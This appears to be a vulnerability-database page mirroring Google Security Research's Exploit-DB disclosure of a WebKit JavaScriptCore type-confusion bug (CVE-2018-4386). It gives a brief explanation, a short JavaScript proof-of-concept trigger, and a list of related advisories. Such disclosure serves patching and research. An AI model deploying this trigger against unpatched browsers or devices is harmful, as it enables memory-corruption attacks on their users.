Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbGoogle Security ResearchEDB-ID:45912
HistoryNov 29, 2018 - 12:00 a.m.

WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Does not Invalidate the 'ForInContext' Object

2018-11-2900:00:00
Google Security Research
www.exploit-db.com
29

AI Score

7.4

Confidence

Low

JSON
/*
This is simillar to  issue 1263 . When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.

PoC:
*/

function trigger() {
    let o = {a: 1};
    for (var k in o) {
        {
            k = 0x1234;

            function k() {

            }
        }

        o[k];
    }
}

trigger();

Related

exploitdb 1
checkpoint_advisories 1
prion 1
debiancve 1
cvelist 1
zdt 2
osv 1
cve 1
exploitpack 1
nvd 1
packetstorm 2
ubuntucve 1
ubuntu 1
openvas 8
nessus 9
apple 12
kaspersky 1
suse 2
exploitdb
exploitdb
Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)
2019-12-31 00:00:00
checkpoint_advisories
checkpoint_advisories
Apple Safari Memory Corruption(CVE-2018-4386)
2020-06-05 00:00:00
prion
prion
Memory corruption
2019-04-03 18:29:00
debiancve
debiancve
CVE-2018-4386
2019-04-03 18:29:12
cvelist
cvelist
CVE-2018-4386
2019-04-03 17:43:17
zdt
zdt
Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution Exploit
2020-01-08 00:00:00
WebKit JSC - BytecodeGenerator::hoistSloppyModeFunctionIfNecessary Exploit
2018-11-29 00:00:00
osv
osv
CVE-2018-4386
2019-04-03 18:29:12
cve
cve
CVE-2018-4386
2019-04-03 18:29:12
exploitpack
exploitpack
Sony Playstation 4 (PS4) 6.72 - WebKit Code Execution (PoC)
2019-12-31 00:00:00
nvd
nvd
CVE-2018-4386
2019-04-03 18:29:12
packetstorm
packetstorm
WebKit JSC ForInContext Invalidation
2018-11-30 00:00:00
Sony Playstation 4 Webkit Code Execution
2020-01-08 00:00:00
ubuntucve
ubuntucve
CVE-2018-4386
2018-11-22 00:00:00
ubuntu
ubuntu
WebKitGTK+ vulnerabilities
2018-11-27 00:00:00
openvas
openvas
Ubuntu: Security Advisory (USN-3828-1)
2018-11-28 00:00:00
Apple iCloud Security Updates (HT209198) - Windows
2018-10-31 00:00:00
Apple Safari Security Updates (HT209196)
2018-10-31 00:00:00
nessus
nessus
Ubuntu 18.04 LTS : WebKitGTK+ vulnerabilities (USN-3828-1)
2018-11-28 00:00:00
macOS : Apple Safari < 12.0.1 Multiple Vulnerabilities
2018-10-31 00:00:00
Apple iTunes < 12.9.1 Multiple Vulnerabilities (uncredentialed check)
2018-11-02 00:00:00
apple
apple
About the security content of Safari 12.0.1 - Apple Support
2019-04-03 09:46:00
About the security content of Safari 12.0.1
2018-10-30 00:00:00
About the security content of iCloud for Windows 7.8 - Apple Support
2019-04-03 09:46:51
kaspersky
kaspersky
KLA11343 Multiple vulnerabilities in Apple iTunes
2018-10-30 00:00:00
suse
suse
Security update for webkit2gtk3 (important)
2019-01-21 00:00:00
Security update for webkit2gtk3 (important)
2019-01-23 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:45912
exploitdb1checkpoint_advisories1prion1debiancve1cvelist1zdt2osv1cve1exploitpack1nvd1packetstorm2ubuntucve1ubuntu1openvas8nessus9apple12kaspersky1suse2